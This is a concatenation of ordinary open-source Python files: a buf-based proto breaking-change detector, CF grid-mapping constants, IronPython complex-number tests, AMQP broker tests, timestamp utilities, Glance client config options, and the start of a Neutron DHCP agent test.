each file to compute a protobuf "state", computes a diff of the "before"
and "after" states, and runs the diff against a set of rules to determine
if there was a breaking change.
The tool is currently implemented with buf (https://buf.build/)
"""
from pathlib import Path
from typing import List
from tools.api_proto_breaking_change_detector.buf_utils import check_breaking, pull_buf_deps
from tools.api_proto_breaking_change_detector.detector_errors import ChangeDetectorError
class ProtoBreakingChangeDetector(object):
"""Abstract breaking change detector interface"""
def run_detector(self) -> None:
"""Run the breaking change detector to detect rule violations
This method should populate the detector's internal data such
that `is_breaking` does not require any additional invocations
to the breaking change detector.
"""
        raise NotImplementedError
def is_breaking(self) -> bool:
"""Return True if breaking changes were detected in the given protos"""
        raise NotImplementedError
def get_breaking_changes(self) -> List[str]:
"""Return a list of strings containing breaking changes output by the tool"""
        raise NotImplementedError
class BufWrapper(ProtoBreakingChangeDetector):
"""Breaking change detector implemented with buf"""
def __init__(
self,
path_to_changed_dir: str,
git_ref: str,
git_path: str,
subdir: str = None,
buf_path: str = None,
config_file_loc: str = None,
additional_args: List[str] = None) -> None:
"""Initialize the configuration of buf
This function sets up any necessary config without actually
running buf against any proto files.
BufWrapper takes a path to a directory containing proto files
as input, and it checks if these proto files break any changes
from a given initial state.
The initial state is input as a git ref. The constructor expects
a git ref string, as well as an absolute path to a .git folder
for the repository.
Args:
            path_to_changed_dir {str} -- absolute path to a directory containing proto files in the after state
            git_ref {str} -- git reference to use for the initial state of the protos (typically a commit hash)
            git_path {str} -- absolute path to .git folder for the repository of interest
            subdir {str} -- subdirectory within the git repository from which to search for .proto files (default: None, i.e. stay in root)
            buf_path {str} -- path to the buf binary (default: "buf")
            config_file_loc {str} -- absolute path to buf.yaml configuration file (if not provided, uses default buf configuration)
            additional_args {List[str]} -- additional arguments passed into the buf binary invocations
"""
if not Path(path_to_changed_dir).is_dir():
raise ValueError(f"path_to_changed_dir {path_to_changed_dir} is not a valid directory")
if Path.cwd() not in Path(path_to_changed_dir).parents:
raise ValueError(
f"path_to_changed_dir {path_to_changed_dir} must be a subdirectory of the cwd ({ Path.cwd() })"
)
if not Path(git_path).exists():
raise ChangeDetectorError(f'path to .git folder {git_path} does not exist')
self._path_to_changed_dir = path_to_changed_dir
self._additional_args = additional_args
self._buf_path = buf_path or "buf"
self._config_file_loc = config_file_loc
self._git_ref = git_ref
self._git_path = git_path
self._subdir = subdir
self._final_result = None
pull_buf_deps(
self._buf_path,
self._path_to_changed_dir,
config_file_loc=self._config_file_loc,
additional_args=self._additional_args)
def run_detector(self) -> None:
self._final_result = check_breaking(
self._buf_path,
self._path_to_changed_dir,
git_ref=self._git_ref,
git_path=self._git_path,
subdir=self._subdir,
config_file_loc=self._config_file_loc,
additional_args=self._additional_args)
def is_breaking(self) -> bool:
if not self._final_result:
raise ChangeDetectorError("Must invoke run_detector() before checking if is_breaking()")
final_code, final_out, final_err = self._final_result
final_out, final_err = '\n'.join(final_out), '\n'.join(final_err)
if final_err != "":
raise ChangeDetectorError(f"Error from buf: {final_err}")
if final_code != 0:
return True
if final_out != "":
return True
return False
    def get_breaking_changes(self) -> List[str]:
        _, final_out, _ = self._final_result
        # materialize into a list so the declared List[str] return type holds
        return [line for line in final_out if len(line) > 0] if self.is_breaking() else []
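# A minimal usage sketch (paths, ref, and binary location are hypothetical):
#
#   detector = BufWrapper(
#       path_to_changed_dir="/abs/path/to/repo/api",  # hypothetical path
#       git_ref="0123abcd",                           # hypothetical commit
#       git_path="/abs/path/to/repo/.git",            # hypothetical path
#   )
#   detector.run_detector()
#   if detector.is_breaking():
#       print("\n".join(detector.get_breaking_changes()))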
| envoyproxy/envoy | tools/api_proto_breaking_change_detector/detector.py | Python | apache-2.0 | 5,354 |
#!/usr/bin/env python
'''
Appendix F. Grid Mappings
---
Each recognized grid mapping is described in one of the sections below. Each
section contains: the valid name that is used with the grid_mapping_name
attribute; a list of the specific attributes that may be used to assign values
to the mapping's parameters; the standard names used to identify the coordinate
variables that contain the mapping's independent variables; and references to
the mapping's definition or other information that may help in using the
mapping. Since the attributes used to set a mapping's parameters may be shared
among several mappings, their definitions are contained in a table in the final
section. The attributes which describe the ellipsoid and prime meridian may be
included, when applicable, with any grid mapping.
We have used the FGDC "Content Standard for Digital Geospatial Metadata" [FGDC]
as a guide in choosing the values for grid_mapping_name and the attribute names
for the parameters describing map projections.
'''
grid_mapping_names = [
'albers_conical_equal_area',
'azimuthal_equidistant',
'lambert_azimuthal_equal_area',
'lambert_conformal_conic',
'lambert_cylindrical_equal_area',
'latitude_longitude',
'mercator',
'orthographic',
'polar_stereographic',
'rotated_latitude_longitude',
'stereographic',
'transverse_mercator',
    'vertical_perspective',
    ]
grid_mapping_attrs = [
'earth_radius',
'false_easting',
'false_northing',
'grid_mapping_name',
'grid_north_pole_latitude',
'grid_north_pole_longitude',
'inverse_flattening',
'latitude_of_projection_origin',
'longitude_of_central_meridian',
'longitude_of_prime_meridian',
'longitude_of_projection_origin',
'north_pole_grid_longitude',
'perspective_point_height',
'scale_factor_at_central_meridian',
'scale_factor_at_projection_origin',
'semi_major_axis',
'semi_minor_axis',
'standard_parallel',
'straight_vertical_longitude_from_pole'
]
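# Illustrative membership checks:
#   'mercator' in grid_mapping_names -> True
#   'false_easting' in grid_mapping_attrs -> True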
| webtrike/compliance-checker | compliance_checker/cf/appendix_f.py | Python | apache-2.0 | 2,157 |
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import unittest
from iptest.type_util import *
from iptest import run_test
class ComplexTest(unittest.TestCase):
def test_from_string(self):
        # complex from string: negative cases
        # - whitespace around the sign joining real and imaginary parts
l = ['1.2', '.3', '4e3', '.3e-4', "0.031"]
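        # complex() accepts leading/trailing whitespace but rejects any space
        # around the sign joining the real and imaginary parts, so each
        # string built below (e.g. "1.2 +.3j") should raise ValueError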
for x in l:
for y in l:
self.assertRaises(ValueError, complex, "%s +%sj" % (x, y))
self.assertRaises(ValueError, complex, "%s+ %sj" % (x, y))
self.assertRaises(ValueError, complex, "%s - %sj" % (x, y))
self.assertRaises(ValueError, complex, "%s- %sj" % (x, y))
self.assertRaises(ValueError, complex, "%s-\t%sj" % (x, y))
self.assertRaises(ValueError, complex, "%sj+%sj" % (x, y))
self.assertEqual(complex(" %s+%sj" % (x, y)), complex(" %s+%sj " % (x, y)))
def test_misc(self):
self.assertEqual(mycomplex(), complex())
a = mycomplex(1)
b = mycomplex(1,0)
c = complex(1)
d = complex(1,0)
for x in [a,b,c,d]:
for y in [a,b,c,d]:
self.assertEqual(x,y)
self.assertEqual(a ** 2, a)
self.assertEqual(a-complex(), a)
self.assertEqual(a+complex(), a)
self.assertEqual(complex()/a, complex())
self.assertEqual(complex()*a, complex())
self.assertEqual(complex()%a, complex())
self.assertEqual(complex() // a, complex())
self.assertEqual(complex(2), complex(2, 0))
def test_inherit(self):
class mycomplex(complex): pass
a = mycomplex(2+1j)
self.assertEqual(a.real, 2)
self.assertEqual(a.imag, 1)
def test_repr(self):
self.assertEqual(repr(1-6j), '(1-6j)')
def test_infinite(self):
self.assertEqual(repr(1.0e340j), 'infj')
self.assertEqual(repr(-1.0e340j),'-infj')
run_test(__name__)
| slozier/ironpython2 | Tests/test_complex.py | Python | apache-2.0 | 2,104 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from txamqp.client import Closed
from txamqp.queue import Empty
from txamqp.content import Content
from txamqp.testlib import TestBase, supportedBrokers, QPID, OPENAMQ
from twisted.internet.defer import inlineCallbacks
class ASaslPlainAuthenticationTest(TestBase):
"""Test for SASL PLAIN authentication Broker functionality"""
@inlineCallbacks
def authenticate(self,client,user,password):
yield client.authenticate(user, password,mechanism='PLAIN')
@inlineCallbacks
def test_sasl_plain(self):
channel = yield self.client.channel(200)
yield channel.channel_open()
yield channel.channel_close()
class ASaslAmqPlainAuthenticationTest(TestBase):
"""Test for SASL AMQPLAIN authentication Broker functionality"""
@inlineCallbacks
def authenticate(self,client,user,password):
yield client.authenticate(user, password,mechanism='AMQPLAIN')
@inlineCallbacks
def test_sasl_amq_plain(self):
channel = yield self.client.channel(200)
yield channel.channel_open()
yield channel.channel_close()
class BrokerTests(TestBase):
"""Tests for basic Broker functionality"""
@inlineCallbacks
def test_amqp_basic_13(self):
"""
First, this test tries to receive a message with a no-ack
        consumer. Second, this test tries to explicitly receive and
acknowledge a message with an acknowledging consumer.
"""
ch = self.channel
yield self.queue_declare(ch, queue = "myqueue")
# No ack consumer
ctag = (yield ch.basic_consume(queue = "myqueue", no_ack = True)).consumer_tag
body = "test no-ack"
ch.basic_publish(routing_key = "myqueue", content = Content(body))
msg = yield ((yield self.client.queue(ctag)).get(timeout = 5))
self.assert_(msg.content.body == body)
        # Acknowledging consumer
yield self.queue_declare(ch, queue = "otherqueue")
ctag = (yield ch.basic_consume(queue = "otherqueue", no_ack = False)).consumer_tag
body = "test ack"
ch.basic_publish(routing_key = "otherqueue", content = Content(body))
msg = yield ((yield self.client.queue(ctag)).get(timeout = 5))
ch.basic_ack(delivery_tag = msg.delivery_tag)
self.assert_(msg.content.body == body)
@inlineCallbacks
def test_basic_delivery_immediate(self):
"""
Test basic message delivery where consume is issued before publish
"""
channel = self.channel
yield self.exchange_declare(channel, exchange="test-exchange", type="direct")
yield self.queue_declare(channel, queue="test-queue")
yield channel.queue_bind(queue="test-queue", exchange="test-exchange", routing_key="key")
reply = yield channel.basic_consume(queue="test-queue", no_ack=True)
queue = yield self.client.queue(reply.consumer_tag)
body = "Immediate Delivery"
channel.basic_publish(exchange="test-exchange", routing_key="key", content=Content(body), immediate=True)
msg = yield queue.get(timeout=5)
self.assert_(msg.content.body == body)
# TODO: Ensure we fail if immediate=True and there's no consumer.
@inlineCallbacks
def test_basic_delivery_queued(self):
"""
Test basic message delivery where publish is issued before consume
(i.e. requires queueing of the message)
"""
channel = self.channel
yield self.exchange_declare(channel, exchange="test-exchange", type="direct")
yield self.queue_declare(channel, queue="test-queue")
yield channel.queue_bind(queue="test-queue", exchange="test-exchange", routing_key="key")
body = "Queued Delivery"
channel.basic_publish(exchange="test-exchange", routing_key="key", content=Content(body))
reply = yield channel.basic_consume(queue="test-queue", no_ack=True)
queue = yield self.client.queue(reply.consumer_tag)
msg = yield queue.get(timeout=5)
self.assert_(msg.content.body == body)
@inlineCallbacks
def test_invalid_channel(self):
channel = yield self.client.channel(200)
try:
yield channel.queue_declare(exclusive=True)
self.fail("Expected error on queue_declare for invalid channel")
except Closed, e:
self.assertConnectionException(504, e.args[0])
@inlineCallbacks
def test_closed_channel(self):
channel = yield self.client.channel(200)
yield channel.channel_open()
yield channel.channel_close()
try:
yield channel.queue_declare(exclusive=True)
self.fail("Expected error on queue_declare for closed channel")
except Closed, e:
self.assertConnectionException(504, e.args[0])
@supportedBrokers(QPID, OPENAMQ)
@inlineCallbacks
def test_channel_flow(self):
channel = self.channel
yield channel.queue_declare(queue="flow_test_queue", exclusive=True)
yield channel.basic_consume(consumer_tag="my-tag", queue="flow_test_queue")
incoming = yield self.client.queue("my-tag")
yield channel.channel_flow(active=False)
channel.basic_publish(routing_key="flow_test_queue", content=Content("abcdefghijklmnopqrstuvwxyz"))
try:
yield incoming.get(timeout=1)
self.fail("Received message when flow turned off.")
        except Empty: pass
yield channel.channel_flow(active=True)
msg = yield incoming.get(timeout=1)
self.assertEqual("abcdefghijklmnopqrstuvwxyz", msg.content.body)
| beevek/txamqp | src/txamqp/test/test_broker.py | Python | apache-2.0 | 6,431 |
#!/usr/bin/env python
# Copyright 2002 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of classes and functions for dealing with dates and timestamps.
The BaseTimestamp and Timestamp are timezone-aware wrappers around Python
datetime.datetime class.
"""
import calendar
import copy
import datetime
import re
import sys
import time
import types
import warnings
from dateutil import parser
import pytz
_MICROSECONDS_PER_SECOND = 1000000
_MICROSECONDS_PER_SECOND_F = float(_MICROSECONDS_PER_SECOND)
def SecondsToMicroseconds(seconds):
"""Convert seconds to microseconds.
Args:
seconds: number
Returns:
microseconds
"""
return seconds * _MICROSECONDS_PER_SECOND
def MicrosecondsToSeconds(microseconds):
"""Convert microseconds to seconds.
Args:
microseconds: A number representing some duration of time measured in
microseconds.
Returns:
A number representing the same duration of time measured in seconds.
"""
return microseconds / _MICROSECONDS_PER_SECOND_F
def _GetCurrentTimeMicros():
"""Get the current time in microseconds, in UTC.
Returns:
The number of microseconds since the epoch.
"""
return int(SecondsToMicroseconds(time.time()))
def GetSecondsSinceEpoch(time_tuple):
"""Convert time_tuple (in UTC) to seconds (also in UTC).
Args:
time_tuple: tuple with at least 6 items.
Returns:
seconds.
"""
return calendar.timegm(time_tuple[:6] + (0, 0, 0))
def GetTimeMicros(time_tuple):
"""Get a time in microseconds.
Arguments:
time_tuple: A (year, month, day, hour, minute, second) tuple (the python
time tuple format) in the UTC time zone.
Returns:
The number of microseconds since the epoch represented by the input tuple.
"""
return int(SecondsToMicroseconds(GetSecondsSinceEpoch(time_tuple)))
def DatetimeToUTCMicros(date):
"""Converts a datetime object to microseconds since the epoch in UTC.
Args:
date: A datetime to convert.
Returns:
The number of microseconds since the epoch, in UTC, represented by the input
datetime.
"""
# Using this guide: http://wiki.python.org/moin/WorkingWithTime
# And this conversion guide: http://docs.python.org/library/time.html
# Turn the date parameter into a tuple (struct_time) that can then be
# manipulated into a long value of seconds. During the conversion from
  # struct_time to long, the source date is in UTC, and so it follows that the
# correct transformation is calendar.timegm()
micros = calendar.timegm(date.utctimetuple()) * _MICROSECONDS_PER_SECOND
return micros + date.microsecond
def DatetimeToUTCMillis(date):
"""Converts a datetime object to milliseconds since the epoch in UTC.
Args:
date: A datetime to convert.
Returns:
The number of milliseconds since the epoch, in UTC, represented by the input
datetime.
"""
return DatetimeToUTCMicros(date) / 1000
def UTCMicrosToDatetime(micros, tz=None):
"""Converts a microsecond epoch time to a datetime object.
Args:
micros: A UTC time, expressed in microseconds since the epoch.
tz: The desired tzinfo for the datetime object. If None, the
datetime will be naive.
Returns:
The datetime represented by the input value.
"""
# The conversion from micros to seconds for input into the
# utcfromtimestamp function needs to be done as a float to make sure
  # we don't lose the sub-second resolution of the input time.
dt = datetime.datetime.utcfromtimestamp(
micros / _MICROSECONDS_PER_SECOND_F)
if tz is not None:
dt = tz.fromutc(dt)
return dt
def UTCMillisToDatetime(millis, tz=None):
"""Converts a millisecond epoch time to a datetime object.
Args:
millis: A UTC time, expressed in milliseconds since the epoch.
tz: The desired tzinfo for the datetime object. If None, the
datetime will be naive.
Returns:
The datetime represented by the input value.
"""
return UTCMicrosToDatetime(millis * 1000, tz)
UTC = pytz.UTC
US_PACIFIC = pytz.timezone('US/Pacific')
class TimestampError(ValueError):
"""Generic timestamp-related error."""
pass
class TimezoneNotSpecifiedError(TimestampError):
"""This error is raised when timezone is not specified."""
pass
class TimeParseError(TimestampError):
"""This error is raised when we can't parse the input."""
pass
# TODO(user): this class needs to handle daylight better
class LocalTimezoneClass(datetime.tzinfo):
"""This class defines local timezone."""
ZERO = datetime.timedelta(0)
HOUR = datetime.timedelta(hours=1)
STDOFFSET = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
DSTOFFSET = datetime.timedelta(seconds=-time.altzone)
else:
DSTOFFSET = STDOFFSET
DSTDIFF = DSTOFFSET - STDOFFSET
def utcoffset(self, dt):
"""datetime -> minutes east of UTC (negative for west of UTC)."""
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC."""
if self._isdst(dt):
return self.DSTDIFF
else:
return self.ZERO
def tzname(self, dt):
"""datetime -> string name of time zone."""
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
"""Return true if given datetime is within local DST."""
tt = (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second,
dt.weekday(), 0, -1)
stamp = time.mktime(tt)
tt = time.localtime(stamp)
return tt.tm_isdst > 0
def __repr__(self):
"""Return string '<Local>'."""
return '<Local>'
def localize(self, dt, unused_is_dst=False):
"""Convert naive time to local time."""
if dt.tzinfo is not None:
raise ValueError('Not naive datetime (tzinfo is already set)')
return dt.replace(tzinfo=self)
def normalize(self, dt, unused_is_dst=False):
"""Correct the timezone information on the given datetime."""
if dt.tzinfo is None:
raise ValueError('Naive time - no tzinfo set')
return dt.replace(tzinfo=self)
LocalTimezone = LocalTimezoneClass()
class BaseTimestamp(datetime.datetime):
"""Our kind of wrapper over datetime.datetime.
The objects produced by methods now, today, fromtimestamp, utcnow,
utcfromtimestamp are timezone-aware (with correct timezone).
We also overload __add__ and __sub__ method, to fix the result of arithmetic
operations.
"""
LocalTimezone = LocalTimezone
@classmethod
def AddLocalTimezone(cls, obj):
"""If obj is naive, add local timezone to it."""
if not obj.tzinfo:
return obj.replace(tzinfo=cls.LocalTimezone)
return obj
@classmethod
def Localize(cls, obj):
"""If obj is naive, localize it to cls.LocalTimezone."""
if not obj.tzinfo:
return cls.LocalTimezone.localize(obj)
return obj
def __add__(self, *args, **kwargs):
"""x.__add__(y) <==> x+y."""
r = super(BaseTimestamp, self).__add__(*args, **kwargs)
return type(self)(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
def __sub__(self, *args, **kwargs):
"""x.__add__(y) <==> x-y."""
r = super(BaseTimestamp, self).__sub__(*args, **kwargs)
if isinstance(r, datetime.datetime):
return type(self)(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
return r
@classmethod
def now(cls, *args, **kwargs):
"""Get a timestamp corresponding to right now.
Args:
args: Positional arguments to pass to datetime.datetime.now().
kwargs: Keyword arguments to pass to datetime.datetime.now(). If tz is not
specified, local timezone is assumed.
Returns:
A new BaseTimestamp with tz's local day and time.
"""
return cls.AddLocalTimezone(
super(BaseTimestamp, cls).now(*args, **kwargs))
@classmethod
def today(cls):
"""Current BaseTimestamp.
Same as self.__class__.fromtimestamp(time.time()).
Returns:
New self.__class__.
"""
return cls.AddLocalTimezone(super(BaseTimestamp, cls).today())
@classmethod
def fromtimestamp(cls, *args, **kwargs):
"""Get a new localized timestamp from a POSIX timestamp.
Args:
args: Positional arguments to pass to datetime.datetime.fromtimestamp().
kwargs: Keyword arguments to pass to datetime.datetime.fromtimestamp().
If tz is not specified, local timezone is assumed.
Returns:
A new BaseTimestamp with tz's local day and time.
"""
return cls.Localize(
super(BaseTimestamp, cls).fromtimestamp(*args, **kwargs))
@classmethod
def utcnow(cls):
"""Return a new BaseTimestamp representing UTC day and time."""
return super(BaseTimestamp, cls).utcnow().replace(tzinfo=pytz.utc)
@classmethod
def utcfromtimestamp(cls, *args, **kwargs):
"""timestamp -> UTC datetime from a POSIX timestamp (like time.time())."""
return super(BaseTimestamp, cls).utcfromtimestamp(
*args, **kwargs).replace(tzinfo=pytz.utc)
@classmethod
def strptime(cls, date_string, format, tz=None):
"""Parse date_string according to format and construct BaseTimestamp.
Args:
date_string: string passed to time.strptime.
format: format string passed to time.strptime.
tz: if not specified, local timezone assumed.
Returns:
New BaseTimestamp.
"""
if tz is None:
return cls.Localize(cls(*(time.strptime(date_string, format)[:6])))
return tz.localize(cls(*(time.strptime(date_string, format)[:6])))
def astimezone(self, *args, **kwargs):
"""tz -> convert to time in new timezone tz."""
r = super(BaseTimestamp, self).astimezone(*args, **kwargs)
return type(self)(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
@classmethod
def FromMicroTimestamp(cls, ts):
"""Create new Timestamp object from microsecond UTC timestamp value.
Args:
ts: integer microsecond UTC timestamp
Returns:
New cls()
"""
return cls.utcfromtimestamp(ts/_MICROSECONDS_PER_SECOND_F)
def AsSecondsSinceEpoch(self):
"""Return number of seconds since epoch (timestamp in seconds)."""
return GetSecondsSinceEpoch(self.utctimetuple())
def AsMicroTimestamp(self):
"""Return microsecond timestamp constructed from this object."""
return (SecondsToMicroseconds(self.AsSecondsSinceEpoch()) +
self.microsecond)
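  # Round-trip sketch (illustrative): FromMicroTimestamp(ts.AsMicroTimestamp())
  # reproduces ts as a UTC instant at microsecond resolution, modulo float
  # rounding inside utcfromtimestamp for far-future values.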
@classmethod
def combine(cls, datepart, timepart, tz=None):
"""Combine date and time into timestamp, timezone-aware.
Args:
datepart: datetime.date
timepart: datetime.time
tz: timezone or None
Returns:
timestamp object
"""
result = super(BaseTimestamp, cls).combine(datepart, timepart)
if tz:
result = tz.localize(result)
return result
# Conversions from interval suffixes to number of seconds.
# (m => 60s, d => 86400s, etc)
_INTERVAL_CONV_DICT = {'s': 1}
_INTERVAL_CONV_DICT['m'] = 60 * _INTERVAL_CONV_DICT['s']
_INTERVAL_CONV_DICT['h'] = 60 * _INTERVAL_CONV_DICT['m']
_INTERVAL_CONV_DICT['d'] = 24 * _INTERVAL_CONV_DICT['h']
_INTERVAL_CONV_DICT['D'] = _INTERVAL_CONV_DICT['d']
_INTERVAL_CONV_DICT['w'] = 7 * _INTERVAL_CONV_DICT['d']
_INTERVAL_CONV_DICT['W'] = _INTERVAL_CONV_DICT['w']
_INTERVAL_CONV_DICT['M'] = 30 * _INTERVAL_CONV_DICT['d']
_INTERVAL_CONV_DICT['Y'] = 365 * _INTERVAL_CONV_DICT['d']
_INTERVAL_REGEXP = re.compile('^([0-9]+)([%s])?' % ''.join(_INTERVAL_CONV_DICT))
def ConvertIntervalToSeconds(interval):
"""Convert a formatted string representing an interval into seconds.
Args:
interval: String to interpret as an interval. A basic interval looks like
"<number><suffix>". Complex intervals consisting of a chain of basic
intervals are also allowed.
Returns:
An integer representing the number of seconds represented by the interval
string, or None if the interval string could not be decoded.
"""
total = 0
while interval:
match = _INTERVAL_REGEXP.match(interval)
if not match:
return None
try:
num = int(match.group(1))
except ValueError:
return None
suffix = match.group(2)
if suffix:
multiplier = _INTERVAL_CONV_DICT.get(suffix)
if not multiplier:
return None
num *= multiplier
total += num
interval = interval[match.end(0):]
return total
class Timestamp(BaseTimestamp):
"""This subclass contains methods to parse W3C and interval date spec.
The interval date specification is in the form "1D", where "D" can be
"s"econds "m"inutes "h"ours "D"ays "W"eeks "M"onths "Y"ears.
"""
INTERVAL_CONV_DICT = _INTERVAL_CONV_DICT
INTERVAL_REGEXP = _INTERVAL_REGEXP
@classmethod
def _StringToTime(cls, timestring, tz=None):
"""Use dateutil.parser to convert string into timestamp.
dateutil.parser understands ISO8601 which is really handy.
Args:
timestring: string with datetime
tz: optional timezone, if timezone is omitted from timestring.
Returns:
New Timestamp or None if unable to parse the timestring.
"""
try:
r = parser.parse(timestring)
except ValueError:
return None
if not r.tzinfo:
r = (tz or cls.LocalTimezone).localize(r)
result = cls(r.year, r.month, r.day, r.hour, r.minute, r.second,
r.microsecond, r.tzinfo)
return result
@classmethod
def _IntStringToInterval(cls, timestring):
"""Parse interval date specification and create a timedelta object.
Args:
timestring: string interval.
Returns:
A datetime.timedelta representing the specified interval or None if
unable to parse the timestring.
"""
seconds = ConvertIntervalToSeconds(timestring)
return datetime.timedelta(seconds=seconds) if seconds else None
@classmethod
def FromString(cls, value, tz=None):
"""Create a Timestamp from a string.
Args:
value: String interval or datetime.
e.g. "2013-01-05 13:00:00" or "1d"
tz: optional timezone, if timezone is omitted from timestring.
Returns:
A new Timestamp.
Raises:
TimeParseError if unable to parse value.
"""
result = cls._StringToTime(value, tz=tz)
if result:
return result
result = cls._IntStringToInterval(value)
if result:
return cls.utcnow() - result
raise TimeParseError(value)
# What's written below is a clear python bug. I mean, okay, I can apply
# a negative timezone to it and the end result will be unconvertible.
MAXIMUM_PYTHON_TIMESTAMP = Timestamp(
9999, 12, 31, 23, 59, 59, 999999, UTC)
# This is also a bug. It is called 32bit time_t. I hate it.
# This is fixed in 2.5, btw.
MAXIMUM_MICROSECOND_TIMESTAMP = 0x80000000 * _MICROSECONDS_PER_SECOND - 1
MAXIMUM_MICROSECOND_TIMESTAMP_AS_TS = Timestamp(2038, 1, 19, 3, 14, 7, 999999)
| googlearchive/titan | titan/common/lib/google/apputils/datelib.py | Python | apache-2.0 | 15,413 |
# -*- encoding: utf-8 -*-
# Copyright (c) 2016 Intel Corp
#
# Authors: Prudhvi Rao Shedimbi <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
glance_client = cfg.OptGroup(name='glance_client',
title='Configuration Options for Glance')
GLANCE_CLIENT_OPTS = [
cfg.StrOpt('api_version',
default='2',
help='Version of Glance API to use in glanceclient.'),
cfg.StrOpt('endpoint_type',
default='publicURL',
help='Type of endpoint to use in glanceclient. '
'Supported values: internalURL, publicURL, adminURL. '
'The default is publicURL.'),
cfg.StrOpt('region_name',
help='Region in Identity service catalog to use for '
'communication with the OpenStack service.')]
def register_opts(conf):
conf.register_group(glance_client)
conf.register_opts(GLANCE_CLIENT_OPTS, group=glance_client)
def list_opts():
return [(glance_client, GLANCE_CLIENT_OPTS)]
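# Typical wiring (illustrative): a service calls register_opts(CONF) once at
# startup, after which the values are read as, e.g.,
# CONF.glance_client.api_version or CONF.glance_client.region_name.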
| openstack/watcher | watcher/conf/glance_client.py | Python | apache-2.0 | 1,593 |
# Copyright (c) 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import os.path
import eventlet
import fixtures
import mock
import netaddr
from neutron_lib import constants as lib_const
from oslo_config import fixture as fixture_config
from oslo_utils import uuidutils
from neutron.agent.common import ovs_lib
from neutron.agent.dhcp import agent
from neutron.agent import dhcp_agent
from neutron.agent.linux import dhcp
from neutron.agent.linux import external_process
from neutron.agent.linux import interface
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils
from neutron.common import utils as common_utils
from neutron.conf.agent import common as config
from neutron.tests.common import net_helpers
from neutron.tests.functional.agent.linux import helpers
from neutron.tests.functional import base
class DHCPAgentOVSTestFramework(base.BaseSudoTestCase):
_DHCP_PORT_MAC_ADDRESS = netaddr.EUI("24:77:03:7d:00:4c")
_DHCP_PORT_MAC_ADDRESS.dialect = netaddr.mac_unix
_TENANT_PORT_MAC_ADDRESS = netaddr.EUI("24:77:03:7d:00:3a")
_TENANT_PORT_MAC_ADDRESS.dialect = netaddr.mac_unix
_IP_ADDRS = {
4: {'addr': '192.168.10.11',
'cidr': '192.168.10.0/24',
'gateway': '192.168.10.1'},
6: {'addr': '2001:db8:0:1::c0a8:a0b',
'cidr': '2001:db8:0:1::c0a8:a00/120',
'gateway': '2001:db8:0:1::c0a8:a01'}, }
def setUp(self):
super(DHCPAgentOVSTestFramework, self).setUp()
config.setup_logging()
self.conf_fixture = self.useFixture(fixture_config.Config())
self.conf = self.conf_fixture.conf
dhcp_agent.register_options(self.conf)
# NOTE(cbrandily): TempDir fixture creates a folder with 0o700
# permissions but agent dir must be readable by dnsmasq user (nobody)
agent_config_dir = self.useFixture(fixtures.TempDir()).path
self.useFixture(
helpers.RecursivePermDirFixture(agent_config_dir, 0o555))
self.conf.set_override("dhcp_confs", agent_config_dir)
self.conf.set_override(
'interface_driver',
'neutron.agent.linux.interface.OVSInterfaceDriver')
self.conf.set_override('report_interval', 0, 'AGENT')
br_int = self.useFixture(net_helpers.OVSBridgeFixture()).bridge
self.conf.set_override('ovs_integration_bridge', br_int.br_name)
self.mock_plugin_api = mock.patch(
'neutron.agent.dhcp.agent.DhcpPluginApi').start().return_value
mock.patch('neutron.agent.rpc.PluginReportStateAPI').start()
self.agent = agent.DhcpAgentWithStateReport('localhost')
self.ovs_driver = interface.OVSInterfaceDriver(self.conf)
self.conf.set_override('check_child_processes_interval', 1, 'AGENT')
def network_dict_for_dhcp(self, dhcp_enabled=True, ip_version=4,
prefix_override=None):
net_id = uuidutils.generate_uuid()
subnet_dict = self.create_subnet_dict(
net_id, dhcp_enabled, ip_version, prefix_override)
port_dict = self.create_port_dict(
net_id, subnet_dict.id,
mac_address=str(self._DHCP_PORT_MAC_ADDRESS),
ip_version=ip_version)
port_dict.device_id = common_utils.get_dhcp_agent_device_id(
net_id, self.conf.host)
net_dict = self.create_network_dict(
net_id, [subnet_dict], [port_dict])
return net_dict
def create_subnet_dict(self, net_id, dhcp_enabled=True, ip_version=4,
prefix_override=None):
cidr = self._IP_ADDRS[ip_version]['cidr']
